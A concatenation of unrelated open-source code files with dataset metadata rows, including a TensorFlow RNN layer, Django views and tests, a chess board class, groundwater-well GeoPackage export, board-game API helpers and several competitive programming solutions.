            with self.name_scope, v1.variable_scope(self.realname, self.default_name):
                self.fw_layer.build(shape)
                self.bw_layer.build(shape)
        else:
            self.fw_layer.build(shape)
    @property
    def output_size(self):
        # (fw, bw) pair for bidirectional layers, a single size otherwise.
        if self.bidirectional:
            return self.fw_layer.output_size, self.bw_layer.output_size
        return self.fw_layer.output_size
    @property
    def state_size(self):
        if self.bidirectional:
            return self.fw_layer.state_size, self.bw_layer.state_size
        return self.fw_layer.state_size
    def __call__(self, inputs, training, sequence_length=None, time_major=False):
        """
        Runs the RNN layer.
        Arguments:
          inputs: Tensor, a rank 3 input tensor with shape [N,T,C] if `time_major`
            is `False`, or with shape [T,N,C] if `time_major` is `True`.
          training: bool, `True` if running in training mode, `False` if running
            in inference mode.
          sequence_length: (optional) Tensor, a rank 1 tensor with shape [N] and
            dtype of `tf.int32` or `tf.int64`. This tensor specifies the unpadded
            length of each example in the input minibatch.
          time_major: (optional) bool, specifies whether `input` has shape [N,T,C]
            (`time_major=False`) or shape [T,N,C] (`time_major=True`).
        Returns:
          A pair, `(output, state)` for unidirectional layers, or a pair
          `([output_fw, output_bw], [state_fw, state_bw])` for bidirectional
          layers.
        """
        # Computation is done time-major internally; convert on the way in/out.
        if not time_major:
            inputs = transpose(inputs, [1, 0, 2])
        result, state = self.fw_layer(inputs, sequence_length, training)
        if self.bidirectional:
            # Feed the backward layer a reversed sequence, then reverse its
            # output back so both directions are aligned in time.
            inputs = reverse_sequence(inputs, sequence_length)
            bw_result, bw_state = self.bw_layer(inputs, sequence_length, training)
            result = result, reverse_sequence(bw_result, sequence_length)
            state = state, bw_state
        if not time_major:
            result = transpose(result, [1, 0, 2])
        return result, state
    @property
    def bidirectional(self):
        """`True` if this is a bidirectional RNN, `False` otherwise."""
        return self.bw_layer is not None
| lmnt-com/haste | frameworks/tf/base_rnn.py | base_rnn.py | py | 3,732 | python | en | code | 306 | github-code | 90 |
36598649418 | import codecs
from bs4 import BeautifulSoup
from konlpy.tag import Okt
import pandas as pd
# Read the novel text file (fix: the handle was previously opened with
# open() and never closed — use a context manager).
with open('001.deep/book.txt', encoding='utf-8') as book_file:
    book = book_file.read()
# print(book)  # dump the whole text

okt = Okt()
word_dic = {}
lines = book.split("\r\n")
# Process one line at a time.
for line in lines:
    # Morphological analysis (normalised, stemmed).
    malist = okt.pos(line, norm=True, stem=True)
    # Each item is a (morpheme, part-of-speech) pair.
    for taeso, pumsa in malist:
        # Count nouns only.
        if pumsa == "Noun":
            word_dic[taeso] = word_dic.get(taeso, 0) + 1
# Sort by frequency, descending.
keys = sorted(word_dic.items(), key=lambda x: x[1], reverse=True)
# Print the 50 most frequent nouns.
for word, count in keys[:50]:
    print("{0}({1})".format(word, count), end="")
print()
37383857728 | import unittest
from contextnet.model import ContextNet
import torch
class TestContextNet(unittest.TestCase):
    """Smoke tests: run a medium ContextNet forward / recognize pass on random data."""
    def test_forward(self):
        batch_size = 3
        seq_length = 500
        input_size = 80
        cuda = torch.cuda.is_available()
        device = torch.device('cuda' if cuda else 'cpu')
        model = ContextNet(
            model_size='medium',
            num_vocabs=10,
        ).to(device)
        # Uninitialised (arbitrary-valued) feature tensor — only shapes matter.
        inputs = torch.FloatTensor(batch_size, seq_length, input_size).to(device)
        input_lengths = torch.IntTensor([500, 450, 350]).to(device)
        # Targets start with 1 and end with 2 followed by 0-padding —
        # presumably sos/eos/pad ids; confirm against the model's config.
        targets = torch.LongTensor([[1, 3, 3, 3, 3, 3, 4, 5, 6, 2],
                                    [1, 3, 3, 3, 3, 3, 4, 5, 2, 0],
                                    [1, 3, 3, 3, 3, 3, 4, 2, 0, 0]]).to(device)
        target_lengths = torch.LongTensor([9, 8, 7]).to(device)
        outputs = model(inputs, input_lengths, targets, target_lengths)
        print(outputs.size())  # torch.Size([3, 59, 9, 10])
    def test_recognize(self):
        batch_size = 3
        seq_length = 500
        input_size = 80
        cuda = torch.cuda.is_available()
        device = torch.device('cuda' if cuda else 'cpu')
        model = ContextNet(
            model_size='medium',
            num_vocabs=10,
        ).to(device)
        inputs = torch.FloatTensor(batch_size, seq_length, input_size).to(device)
        input_lengths = torch.IntTensor([500, 450, 350]).to(device)
        # Greedy decoding path (no targets supplied).
        outputs = model.recognize(inputs, input_lengths)
        print(outputs.size())  # torch.Size([3, 59])
if __name__ == '__main__':
unittest.main()
| upskyy/ContextNet | test/test_contextnet.py | test_contextnet.py | py | 1,611 | python | en | code | 27 | github-code | 90 |
18561397949 | from collections import defaultdict
from itertools import groupby, accumulate, product, permutations, combinations
def solve(names=None):
    """Count triples of people whose names start with 3 distinct MARCH letters.

    names: optional list of name strings; when None (the original behaviour)
    reads N and then N names from stdin.
    Returns the number of 3-person combinations whose initials are three
    different letters of 'MARCH'.
    """
    if names is None:
        n = int(input())
        names = [input() for _ in range(n)]
    counts = defaultdict(int)
    for name in names:
        counts[name[0]] += 1
    total = 0
    # For every choice of 3 distinct MARCH initials, multiply how many names
    # carry each initial (0 for absent initials) and accumulate.
    for trio in combinations('MARCH', 3):
        prod = 1
        for letter in trio:
            prod *= counts[letter]
        total += prod
    return total
print(solve()) | Aasthaengg/IBMdataset | Python_codes/p03425/s065180764.py | s065180764.py | py | 393 | python | en | code | 0 | github-code | 90 |
34062200065 | from django.urls import path
from . import views
# URL namespace for this app's route names.
app_name = 'bankcard'
urlpatterns = [
    # Submit a new card request.
    path('request/', views.card_request, name='card_request'),
    # Approve a specific pending request.
    path('approve/<int:card_request_id>/', views.card_approval, name='card_approval'),
    path('user_cards/', views.user_cards, name='user_cards'),
    path('cards_types/', views.cards_types, name='cards_types'),
    path('approve_select_user/', views.approve_select_user, name='approve_select_user'),
]
| thanosronin51/2ndRenewed | bankcard/urls.py | urls.py | py | 473 | python | en | code | 0 | github-code | 90 |
17966757309 | import math
def lcm(x, y):
    """Least common multiple of two integers."""
    g = math.gcd(x, y)
    return x // g * y
from functools import reduce

# Read N periods, one per line.
N = int(input())
t_li = [int(input()) for _ in range(N)]
# Fold lcm over all values; reduce on a single-element list returns that
# element, so the previous N == 1 special case is unnecessary.
ans = reduce(lcm, t_li)
print(ans)
| Aasthaengg/IBMdataset | Python_codes/p03633/s354468503.py | s354468503.py | py | 279 | python | en | code | 0 | github-code | 90 |
6438571161 | # 백준 18870 (시간초과ㅠ)
# BOJ 18870: coordinate compression — each value maps to the number of
# distinct values smaller than it.
N = int(input())
X = list(map(int, input().split()))
# Fix for the TLE noted above: the old nested scan was O(N * |distinct|);
# ranking the sorted distinct values once is O(N log N), same output.
rank = {v: i for i, v in enumerate(sorted(set(X)))}
compact = [rank[x] for x in X]
print(*compact)
40150918151 | import json
from django.contrib.auth.decorators import login_required
from django.db import DatabaseError
from django.http import HttpResponseNotFound, HttpResponseBadRequest, HttpResponse, Http404
from django.shortcuts import redirect, render
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
from dashboard.form import UploadForm, RecordEditForm
from dashboard.models import *
@require_POST
@csrf_exempt
def upload(request):
    """API endpoint: authenticate by token and store an uploaded run record.

    POST fields:
      token -- must match some User.profile.token
      data  -- JSON-encoded payload validated by UploadForm
    Creates a Record plus one Dataloader row per dataloader entry and returns
    {'code': 'ok', 'id': ...}; error cases return a JSON body with an error
    code (400 except for the missing-data case, which returns 200).
    """
    print('uploading...')
    print(request.POST)
    token = request.POST.get('token', '')
    try:
        user = User.objects.get(profile__token=token)
    except User.DoesNotExist as e:
        return HttpResponseBadRequest(json.dumps({
            "code": "bad token",
            "err": str(token),
        }))
    form = request.POST.get('data', None)
    if not form:
        return HttpResponse(json.dumps({
            'code': 'no data'
        }))
    try:
        form = json.loads(form)
        form = UploadForm(form)
    except json.JSONDecodeError as e:
        return HttpResponseBadRequest(json.dumps({
            'code': 'wrong format',
            'err': str(e),
        }))
    if not form.is_valid():
        # print(form.errors.as_json())
        return HttpResponseBadRequest(json.dumps({
            'code': 'unknown error',
            'err': form.errors.as_json(),
        }))
    record = Record.objects.create(
        user=user,
        entry=form.cleaned_data['entry'],
        args=form.cleaned_data['args'],
        working_dir=form.cleaned_data['working_dir'],
        git_user=form.cleaned_data['git_user'],
        git_repo=form.cleaned_data['git_repo'],
        git_commit=form.cleaned_data['git_commit'],
        record_information=form.cleaned_data['record_information'],
        result=form.cleaned_data['result'],
    )
    # Each entry appears to be a list whose first element holds the dataloader
    # dict (hence the [0]) — confirm against UploadForm's validation.
    for dataloader in form.cleaned_data['record_information']['dataloader']:
        Dataloader.objects.create(
            file_id=dataloader[0]['file_id'],
            clsname=dataloader[0]['clsname'],
            record=record,
        )
    return HttpResponse(json.dumps({
        'code': 'ok',
        'id': record.id,
    }))
def get(request):
    """Return one Record as a JSON document, looked up by the ?id= parameter.

    404s when the id is missing or unknown. Note: unlike show(), this endpoint
    does not check record.hidden.
    """
    rid = request.GET.get('id', None)
    if not rid:
        raise Http404('ID does not exist')
    try:
        record = Record.objects.get(id=rid)
    except Record.DoesNotExist:
        raise Http404('ID does not exist')
    res = {
        'id': record.id,
        'user': record.user.username,
        'entry': record.entry,
        'args': record.args,
        'working_dir': record.working_dir,
        'git_user': record.git_user,
        'git_repo': record.git_repo,
        'git_commit': record.git_commit,
        'record_information': record.record_information,
        'result': record.result,
    }
    return HttpResponse(json.dumps(res))
def show(request):
    """Render the record detail page for ?id=.

    Hidden records are visible only to their owner; others get a 404.
    """
    rid = request.GET.get('id', None)
    if not rid:
        raise Http404('ID does not exist')
    try:
        record = Record.objects.get(id=rid)
    except Record.DoesNotExist:
        raise Http404('ID does not exist')
    if record.hidden and record.user != request.user:
        raise Http404('Permission denied')
    # Run configuration summary shown by the template.
    config = {
        'entry': record.entry,
        'args': record.args,
        'working_dir': record.working_dir,
    }
    # NOTE(review): passing locals() exposes every local name to the template.
    return render(request, 'dashboard/show.html', locals())
@login_required
def edit(request):
    """Owner-only record editing.

    GET renders the edit form for ?id=; POST either deletes the record (when
    a 'delete' field is present) or validates and saves the form, then
    redirects. Non-owners get 404 (GET) / 400 (POST).
    """
    if request.method == 'GET':
        rid = request.GET.get('id', None)
        if not rid:
            raise Http404('ID does not exist')
        try:
            record = Record.objects.get(id=rid)
        except Record.DoesNotExist:
            raise Http404('ID does not exist')
        if record.user != request.user:
            raise Http404('Permission denied')
        form = RecordEditForm(instance=record)
        return render(request, 'dashboard/edit.html', locals())
    elif request.method == 'POST':
        rid = request.POST.get('id', None)
        if not rid:
            return HttpResponseBadRequest('ID does not exist')
        try:
            record = Record.objects.get(id=rid)
        except Record.DoesNotExist:
            return HttpResponseBadRequest('ID does not exist')
        if record.user != request.user:
            return HttpResponseBadRequest('Permission denied')
        # Delete takes precedence over saving edits.
        if 'delete' in request.POST:
            record.delete()
            return redirect('records')
        form = RecordEditForm(request.POST, instance=record)
        if form.is_valid():
            form.save()
            return redirect('/show?id={}'.format(rid))
        else:
            return HttpResponseBadRequest('Invalid form')
@login_required
@require_POST
def update(request):
    """Owner-only update of a record's description field.

    Redirects to the detail page on success; returns 204 when no (non-empty)
    description was supplied.
    """
    rid = request.POST.get('id', None)
    if not rid:
        return HttpResponseBadRequest('ID does not exist')
    try:
        record = Record.objects.get(id=rid)
    except Record.DoesNotExist:
        return HttpResponseBadRequest('ID does not exist')
    if record.user != request.user:
        return HttpResponseBadRequest('You have no permission to do this')
    description = request.POST.get('description', None)
    if description:
        try:
            record.description = description
            record.save()
        except DatabaseError:
            # Saving can fail when the value exceeds the column length.
            return HttpResponseBadRequest('Description too long')
        return redirect('/show?id={}'.format(rid))
    # No content
    return HttpResponse(status=204)
| thu-coai/cotk_dashboard | dashboard/views/records.py | records.py | py | 5,481 | python | en | code | 2 | github-code | 90 |
18232841349 | if __name__ == '__main__':
    N = int(input())
    Als = [int(a) for a in input().split()]
    # Pair each value with its original 1-based position, largest first.
    lst = []
    for i in range(N):
        lst.append([Als[i],i+1])
    lst.sort(reverse = True)
    # DP[i][j] appears to be: best total after placing the i+j largest values,
    # i of them at the left end and j at the right end (gain = value * moved
    # distance) — confirm against the problem statement.
    DP = [[0] * (N+1) for _ in range(N+1)]
    ans = 0
    # Edge rows/columns: everything placed on one side only.
    for i in range(1,N+1):
        a = lst[i-1][0]
        index = lst[i-1][1]
        vx = DP[i-1][0] + a * abs(index-i)
        vy = DP[0][i-1] + a * abs(index-(N-i+1))
        DP[i][0] = vx
        DP[0][i] = vy
        if ans < vx:
            ans = vx
        if ans < vy:
            ans = vy
    # Interior: the (i+j)-th largest value goes to slot i from the left or
    # slot j from the right, whichever gains more.
    for i in range(1,N+1):
        for j in range(1,N+1):
            if i + j <= N:
                a = lst[i+j-1][0]
                index = lst[i+j-1][1]
                v = max(DP[i-1][j] + a * abs(index-i),DP[i][j-1] + a * abs(index-(N-j+1)))
                DP[i][j] = v
                if ans < v:
                    ans = v
            else:
                break
print(int(ans)) | Aasthaengg/IBMdataset | Python_codes/p02709/s923534534.py | s923534534.py | py | 729 | python | en | code | 0 | github-code | 90 |
21613436978 | #!/usr/bin/python
from time import gmtime, strftime, time
from reportlab.lib import colors
from reportlab.lib.pagesizes import letter, inch
from reportlab.platypus import SimpleDocTemplate, Table, TableStyle
from itertools import izip_longest
def dates(starttime = time(), count = 20, repeat = 2, decorate = None):
    """Yield `count` date strings: consecutive days, each repeated `repeat`
    times with the matching (prefix, suffix) pair from `decorate` applied.

    NOTE: the `starttime = time()` default is evaluated once at import time,
    so later calls without `starttime` all use the module-load timestamp.
    """
    if decorate is None:
        decorate = [ ('', '') ] * repeat
    for i in xrange(0, count//repeat):
        o = strftime('%Y %b %d', gmtime(starttime + 24*60*60*i))
        for j in xrange(0, repeat):
            yield decorate[j][0] + o + decorate[j][1]
def grouper(iterable, n, fillvalue=None):
    'Collect data into fixed-length chunks or blocks'
    # grouper('ABCDEFG', 3, 'x') -> ABC DEF Gxx
    # n references to the SAME iterator: zipping them slices consecutive chunks.
    args = [iter(iterable)] * n
    return izip_longest(fillvalue=fillvalue, *args)
def dates_table(starttime = time(), rows=26, columns=3):
    """Return a rows x columns table (list of row tuples) of decorated date
    strings; dates run down each column, alternating '>>>' / '<<<' markers."""
    decorate = [
        (' ', ' >>>'),
        ('<<< ', ' ')
    ]
    d = dates(starttime=starttime, count=rows*columns, repeat=2, decorate=decorate)
    # Chunk into columns of `rows` entries, then transpose into rows.
    g = grouper(d, rows)
    return zip(*g)
# Build the PDF: a single table of dates drawn with a plain grid style.
doc = SimpleDocTemplate("egg_dates.pdf", pagesize = letter)
elements = []
t =Table(dates_table())
t.setStyle(TableStyle([
    ('FONT', (0,0), (-1,-1), 'Courier-Bold', 15),
    ('ALIGN', (0,0), (-1,-1), 'CENTER'),
    ('VALIGN', (0,0), (-1,-1), 'MIDDLE'),
    ('INNERGRID', (0,0), (-1,-1), 0.25, colors.black),
    ('BOX', (0,0), (-1,-1), 0.25, colors.black)
]))
elements.append(t)
doc.build(elements)
| sgproduce/sgproduce.github.io | snippets/egg_dates.py | egg_dates.py | py | 1,490 | python | en | code | 0 | github-code | 90 |
18267945849 | n,k = map(int,input().split())
mod = 1000000007
def comb(n,k):
    # Binomial coefficient C(n, k) mod p from the precomputed tables below;
    # 0 for out-of-range arguments.
    if n < k: return 0
    if n < 0 or k < 0: return 0
    return fac[n]*finv[k]%mod*finv[n-k]%mod
# fac[i] = i! mod p; finv[i] = inverse of i! via Fermat (pow(x, p-2, p)).
fac = [1]*(n+1)
finv = [1]*(n+1)
for i in range(1,n+1):
    fac[i] = fac[i-1]*i%mod
    finv[i] = pow(fac[i],mod-2,mod)
# Accumulate sum of C(n, i) * C(n-1, i) for i up to min(k, n-1).
ans = 0
for i in range(min(k+1,n)):
    ans += comb(n,i)*comb(n-1,i)%mod
    ans %= mod
print(ans) | Aasthaengg/IBMdataset | Python_codes/p02769/s425052214.py | s425052214.py | py | 381 | python | en | code | 0 | github-code | 90 |
class Solution:
    def kthSmallest(self, matrix: List[List[int]], k: int) -> int:
        """Return the k-th smallest value of an N x N matrix whose rows and
        columns are sorted ascending.

        Uses a min-heap over row frontiers: O(k log N) pops instead of
        draining all N*N entries, and the input matrix is no longer mutated
        (the previous version emptied every row via pop()).
        """
        N = len(matrix)
        # Only the first min(k, N) rows can contribute to the first k values.
        heap = [(matrix[i][0], i, 0) for i in range(min(k, N))]
        heapify(heap)
        while k > 1:
            # Discard the current minimum and advance within its row.
            _, i, j = heappop(heap)
            if j + 1 < N:
                heappush(heap, (matrix[i][j + 1], i, j + 1))
            k -= 1
        return heap[0][0]
38858330186 | from constants import *
from piece import *
import chess
class Square:
    """A single board square at (rank, file), optionally holding a piece."""

    def __init__(self, rank, file, piece=None):
        self.rank = rank
        self.file = file
        self.piece = piece

    def has_piece(self):
        """Return True when a piece occupies this square.

        Uses an identity check against None (idiom fix for `!= None`).
        """
        return self.piece is not None
class Board:
    """RANKS x FILES grid of Square objects with the standard starting setup."""
    def __init__(self):
        self.squares = [FILES*[0] for rank in range(RANKS)]
        self.last_move = None
        self._create()
        self._add_piece('white')
        self._add_piece('black')
    def move(self, piece, move, enpassant=False, promotion=False, kingcastling=False, queencastling=False, piece_colour='white'):
        """Apply `move` (with .initial/.final squares) to the board.

        NOTE(review): the trailing `elif promotion==False` is chained to the
        `if queencastling` above it, so it also runs after the en-passant and
        king-castling branches — harmless after castling (the squares were
        already set) and required for en passant / plain moves, but fragile.
        """
        initial = move.initial
        final = move.final
        if enpassant==True:
            # Remove the pawn captured in passing (same rank as the mover).
            self.squares[initial.rank][final.file].piece = None
        if promotion==True:
            # Promoting always yields a queen.
            self.squares[initial.rank][initial.file].piece = None
            self.squares[final.rank][final.file].piece = Queen(piece_colour)
        if kingcastling==True:
            # king move
            self.squares[initial.rank][initial.file].piece = None
            self.squares[final.rank][final.file].piece = piece
            # rook move
            self.squares[final.rank][final.file+1].piece = None
            self.squares[final.rank][final.file-1].piece = Rook(piece_colour)
        if queencastling==True:
            # king move
            self.squares[initial.rank][initial.file].piece = None
            self.squares[final.rank][final.file].piece = piece
            # rook move
            self.squares[final.rank][final.file-2].piece = None
            self.squares[final.rank][final.file+1].piece = Rook(piece_colour)
        elif promotion==False:
            # Plain move: clear the origin, place the piece on the target.
            self.squares[initial.rank][initial.file].piece = None
            self.squares[final.rank][final.file].piece = piece
        self.last_move = move
    def valid_move(self, move, current_board):
        """Check `move` (UCI string) against python-chess's legal move list."""
        valid_moves = [str(idx) for idx in current_board.legal_moves]
        print(valid_moves) #CHECKPOINT — debug leftover
        return True if move in valid_moves else False
    def _create(self):
        # Fill the grid with empty Square objects.
        for rank in range(RANKS):
            for file in range(FILES):
                self.squares[rank][file] = Square(rank, file)
    def _add_piece(self, colour):
        """Place one side's initial pieces (white on ranks 6/7, black on 1/0)."""
        pawn_rank, major_rank = (6, 7) if colour == 'white' else (1, 0)
        # pawns
        for file in range(FILES):
            self.squares[pawn_rank][file] = Square(pawn_rank, file, Pawn(colour))
        # knights
        self.squares[major_rank][1] = Square(major_rank, 1, Knight(colour))
        self.squares[major_rank][6] = Square(major_rank, 6, Knight(colour))
        # bishops
        self.squares[major_rank][2] = Square(major_rank, 2, Bishop(colour))
        self.squares[major_rank][5] = Square(major_rank, 5, Bishop(colour))
        # rooks
        self.squares[major_rank][0] = Square(major_rank, 0, Rook(colour))
        self.squares[major_rank][7] = Square(major_rank, 7, Rook(colour))
        # queen
        self.squares[major_rank][3] = Square(major_rank, 3, Queen(colour))
        # king
        self.squares[major_rank][4] = Square(major_rank, 4, King(colour))
| jorgegmartin/Chess_Engine_TFM | chess_game/gui/board.py | board.py | py | 3,153 | python | en | code | 0 | github-code | 90 |
10157154685 | from pprint import pprint, pformat
from geopandas import GeoDataFrame
import requests
from geojson import Feature, Point, FeatureCollection
from topo import get_state, get_huc8, get_place, get_county
def rget(url, callback=None, recursive=True):
    """GET a SensorThings collection, following '@iot.nextLink' pagination.

    Accumulates each page's 'value' array (or the raw JSON when absent) into
    a single list; `callback(items, page_json)` overrides that accumulation.
    """
    items = []
    def _get(u):
        print('url={}'.format(u))
        resp = requests.get(u)
        print('resp={}'.format(resp))
        j = resp.json()
        if callback:
            callback(items, j)
        else:
            try:
                items.extend(j['value'])
            except KeyError:
                items.append(j)
        try:
            # NOTE(review): `next` shadows the builtin.
            next = j['@iot.nextLink']
        except KeyError:
            return
        if recursive:
            _get(next)
    _get(url)
    return items
GEOCONNEX = 'https://geoconnex.us'
def nmbgmr_uri_factory(name):
    """Mint the geoconnex.us URI for an NMBGMR well with the given name."""
    template = '{}/nmwdi/nmbgmr/wells/{}'
    return template.format(GEOCONNEX, name)
def ose_uri_factory(name):
    """Mint the geoconnex.us URI for an OSE well with the given name."""
    template = '{}/nmwdi/ose/wells/{}'
    return template.format(GEOCONNEX, name)
def nmbgmr_props_factory(loc, thing):
    """Build the GeoJSON property dict for an NMBGMR well Thing (in place).

    Uses the Thing name as both 'id' and 'agency_id', drops the internal
    point-id key, and coerces 'welldepth' to a float (0.0 when missing or
    unparseable).
    """
    props = thing['properties']
    props['id'] = thing['name']
    props['agency_id'] = thing['name']
    props.pop('@nmbgmr.point_id', None)
    try:
        wd = float(props.pop('welldepth', 0))
    except (TypeError, ValueError):
        # Narrowed from BaseException (which also caught KeyboardInterrupt /
        # SystemExit); float() can only raise these two for bad values.
        wd = 0
    props['welldepth'] = float(wd)
    return props
def ose_props_factory(loc, thing):
    """Build the GeoJSON property dict for an OSE well Thing (in place)."""
    props = thing['properties']
    well_name = thing['name']
    props['id'] = well_name
    props['agency_id'] = well_name
    return props
def get_geojson_features(url, factory, uri_factory):
    """Fetch all Locations (with Things) from `url` and build a GeoJSON
    FeatureCollection, one Feature per (location, thing) pair.

    `factory(loc, thing)` builds agency-specific properties; admin fields
    (state/huc8/place/county) come from the topo module, and 'sta' links back
    to the SensorThings entity with observations expanded.
    """
    def feature_factory(i, loc, thing):
        props = factory(loc, thing)
        props['sta'] = '{}?$expand=Datastreams/Observations'.format(thing['@iot.selfLink'])
        props['state'] = get_state(loc)
        props['huc8'] = get_huc8(loc)
        props['place'] = get_place(loc)
        props['county'] = get_county(loc)
        props['uri'] = uri_factory(thing['name'])
        print('construct:{:05n} {} properties={}'.format(i, thing['name'],
                                                         pformat(props)))
        return Feature(properties=props,
                       geometry=Point(loc['location']['coordinates']))
    items = rget(url, recursive=True)
    return FeatureCollection([feature_factory(i, loc, thing) for i, loc in enumerate(items) for thing in loc['Things']])
def write_gpkg(fc, name='nmbgmr_wells'):
    """Write a GeoJSON FeatureCollection to <name>.gpkg via GeoPandas."""
    frame = GeoDataFrame.from_features(fc['features'])
    frame.to_file('{}.gpkg'.format(name), driver='GPKG')
def main():
    """Export NMBGMR and OSE well locations to GeoPackage files."""
    # write nmbgmr wells
    url = 'https://st.newmexicowaterdata.org/FROST-Server/v1.1/Locations?$expand=Things'
    fs = get_geojson_features(url, nmbgmr_props_factory, nmbgmr_uri_factory)
    write_gpkg(fs)
    # write ose wells
    url = 'https://ose.newmexicowaterdata.org/FROST-Server/v1.1/Locations?$expand=Things'
    fs = get_geojson_features(url, ose_props_factory, ose_uri_factory)
    write_gpkg(fs, 'ose_wells')
if __name__ == '__main__':
main()
# ============= EOF =============================================
| NMWDI/pygeoapi_config | generate_wells_gpkg.py | generate_wells_gpkg.py | py | 3,128 | python | en | code | 1 | github-code | 90 |
37719327774 | from flask_app.config.mysqlconnection import MySQLConnection
import requests
import os
from flask_app import app
from flask import flash, request, jsonify
import logging
logging.basicConfig(level=logging.DEBUG)
class Game:
    """Board Game Atlas lookups plus per-user favorite/owned game persistence.

    NOTE(review): the client_id is hard-coded in every request URL even though
    get_game_info reads a 'boardgame_atlas_api' env var — and that env value
    is written to the debug log, which leaks the secret; confirm and clean up.
    """
    def __init__(self, db_data):
        self.atlas_game_id = db_data['atlas_game_id']
        self.atlas_game_name = db_data['atlas_game_name']
    @classmethod
    def get_game_info(cls, data):
        """Fetch one game's details from Board Game Atlas by atlas_game_id."""
        boardgame_atlas = os.environ.get("boardgame_atlas_api")
        logging.debug(f'This is from os.environ[key]: {boardgame_atlas}')
        logging.debug("next is from environ")
        logging.debug({os.environ.get("boardgame_atlas_api")})
        results = requests.get(f'https://api.boardgameatlas.com/api/search?client_id=AWoH1mhoWo&ids={data["atlas_game_id"]}')
        results_json = results.json()
        game_info = results_json["games"][0]
        return game_info
    @classmethod
    def get_random_game(cls):
        """Fetch a random game from Board Game Atlas."""
        results = requests.get(f'https://api.boardgameatlas.com/api/search?client_id=AWoH1mhoWo&random=true')
        results_json = results.json()
        game_info = results_json["games"][0]
        return game_info
    @classmethod
    def search_for_games(cls, data):
        """Search Board Game Atlas by name; returns up to 3 game dicts."""
        results = requests.get(f'https://api.boardgameatlas.com/api/search?name={data["search_term"]}&limit=3&client_id=AWoH1mhoWo')
        results = results.json()
        results = results['games']
        search_results=[]
        for game in results:
            search_results.append(game)
        return search_results
    @classmethod
    def add_favorite_game(cls, data):
        query = 'INSERT INTO users_favorite_games (user_id, atlas_game_id, atlas_game_name) VALUES (%(user_id)s, %(atlas_game_id)s, %(atlas_game_name)s);'
        return MySQLConnection('find_players').query_db(query, data)
    @classmethod
    def is_favorite_game(cls, data):
        """True when (user_id, atlas_game_id) already exists in favorites."""
        is_favorite = False
        query = 'SELECT * FROM users_favorite_games WHERE user_id = %(user_id)s AND atlas_game_id = %(atlas_game_id)s'
        check_favorite = MySQLConnection('find_players').query_db(query, data)
        if check_favorite:
            is_favorite = True
        return is_favorite
    @classmethod
    def get_favorite_games(cls, data):
        """Return the user's favorites as Game instances."""
        query = 'SELECT * FROM users_favorite_games WHERE user_id=%(user_id)s;'
        results = MySQLConnection('find_players').query_db(query, data)
        favorite_games = []
        for game in results:
            favorite_games.append(cls(game))
        return favorite_games
    @classmethod
    def remove_favorite_game(cls, data):
        query = 'DELETE FROM users_favorite_games WHERE user_id = %(user_id)s AND atlas_game_id = %(atlas_game_id)s'
        return MySQLConnection('find_players').query_db(query, data)
    @classmethod
    def add_owned_game(cls, data):
        query = 'INSERT INTO users_own_games (user_id, atlas_game_id, atlas_game_name) VALUES (%(user_id)s, %(atlas_game_id)s, %(atlas_game_name)s);'
        return MySQLConnection('find_players').query_db(query, data)
    @classmethod
    def get_owned_games(cls, data):
        """Return the user's owned games as Game instances."""
        query = 'SELECT * FROM users_own_games WHERE user_id=%(user_id)s;'
        results = MySQLConnection('find_players').query_db(query, data)
        owned_games = []
        for game in results:
            owned_games.append(cls(game))
        return owned_games
    @classmethod
    def is_owned_game(cls, data):
        """True when (user_id, atlas_game_id) already exists in owned games."""
        is_owned = False
        query = 'SELECT * FROM users_own_games WHERE user_id = %(user_id)s AND atlas_game_id = %(atlas_game_id)s'
        check_owned = MySQLConnection('find_players').query_db(query, data)
        if check_owned:
            is_owned = True
        return is_owned
    @classmethod
    def remove_owned_game(cls, data):
        query = "DELETE FROM users_own_games WHERE user_id = %(user_id)s AND atlas_game_id = %(atlas_game_id)s"
        return MySQLConnection('find_players').query_db(query, data)
| aaroncourt/Find-Players | flask_app/models/game.py | game.py | py | 4,042 | python | en | code | 1 | github-code | 90 |
37780708119 | #Este código se puede utilizar usando heaps (colas de prioridad) para optimizar el uso en memoria
# This code could be rewritten with heaps (priority queues) to optimize
# memory use and execution time.
#
# Sorting the candidate list on every iteration costs O(n*log(n)) per step;
# with a heap it would be O(log(n)).
def beam_search(graph, start, goal, heuristic_table, beam_width):
    """Heuristic beam search from start to goal; returns the found path or None.

    Each round expands only the `beam_width` cheapest frontier paths, where
    cost = accumulated (edge cost + per-node heuristic) along the path.
    """
    expanded = set()
    frontier = [(0, [start])]          # (cost, path) entries
    while frontier:
        # Keep only the cheapest `beam_width` candidates for this round.
        best = sorted(frontier, key=lambda entry: entry[0])[:beam_width]
        successors = []
        for cost, path in best:
            frontier.remove((cost, path))
            node = path[-1]
            if node == goal:
                return path
            if node in expanded:
                continue
            expanded.add(node)
            for neighbor, edge_cost in graph.content[node]:
                new_cost = cost + int(edge_cost) + int(heuristic_table[neighbor])
                successors.append((new_cost, path + [neighbor]))
        frontier.extend(successors)
    return None
35753160891 | #!/usr/bin/env python
from itertools import combinations
def gcd(x, y):
    """Greatest common divisor of x and y via Euclid's algorithm."""
    while y != 0:
        remainder = x % y
        x, y = y, remainder
    return x
# Number of test cases on the first line of stdin.
n=int(input())
li=[]
for _ in range(n):
    # Each line is: a count followed by the values. Reversing and dropping
    # the last element removes the original leading count, keeping only data.
    li=list(map(int,input().split()))
    li=li[::-1]
    del li[-1]
    com=combinations(li,2)
    res=0
    # Sum gcd over every unordered pair; one total printed per test case.
    for i in com:
        res+=gcd(i[0],i[1])
    print(res)
| hansojin/python | mathematics/bj9613.py | bj9613.py | py | 331 | python | en | code | 0 | github-code | 90 |
14585811899 | # -*- coding: utf-8 -*-
from __future__ import print_function, unicode_literals
from django.core.exceptions import ImproperlyConfigured
from django.db import connections
from django.db.models.sql.constants import CURSOR, NO_RESULTS, SINGLE
from django.db.utils import OperationalError, ProgrammingError
from django.test.testcases import TestCase
from rest_models.backend.compiler import SQLCompiler
from rest_models.test import RestModelTestCase
from testapp.models import Pizza
class TestSqlCompiler(TestCase):
    """
    Coverage-oriented tests for SQLCompiler: special cases that are not easy
    to trigger through the normal queryset API.
    """
    databases = ['default', 'api']
    fixtures = ['data.json']
    def get_compiler(self, queryset):
        # Build a SQLCompiler bound to the 'api' (rest-models) connection.
        return SQLCompiler(queryset.query, connections['api'], 'api')
    def test_no_result(self):
        # NO_RESULTS executions return None.
        compiler = self.get_compiler(
            Pizza.objects.all(),
        )
        self.assertEqual(
            compiler.execute_sql(NO_RESULTS),
            None
        )
    def test_no_result_type(self):
        # An unknown/None result_type also yields None.
        compiler = self.get_compiler(
            Pizza.objects.all()
        )
